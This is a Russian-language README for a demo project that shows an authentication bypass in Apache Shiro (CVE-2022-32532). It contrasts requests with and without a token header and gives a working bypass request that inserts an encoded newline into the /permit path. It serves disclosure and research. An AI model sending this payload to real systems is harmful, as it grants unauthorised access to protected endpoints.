
Apache Shiro CVE-2022-32532
Это демонстрационный проект, который показывает лишь одно из условий эксплуатации этой уязвимости (CVE-2022-32532).
На самом деле существует больше способов её эксплуатации: пока разработчики используют RegExPatternMatcher, будет оставаться возможная уязвимость обхода.
При текущей конфигурации требуется проверка токена в заголовке запроса, иначе у вас нет прав доступа к интерфейсу по пути /permit
Этот запрос может быть успешным
GET /permit/any HTTP/1.1
Token: 4ra1n
Доступ не разрешается, если в запросе отсутствует заголовок токена
GET /permit/any HTTP/1.1
Его можно обойти простым способом в особых, но распространённых конфигурациях
GET /permit/a%0any HTTP/1.1
https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
Эта уязвимость похожа на Spring-Security CVE-2022-22978
Благодарность bdemers (участник Apache Shiro PMC) и chybeta (исследователь безопасности)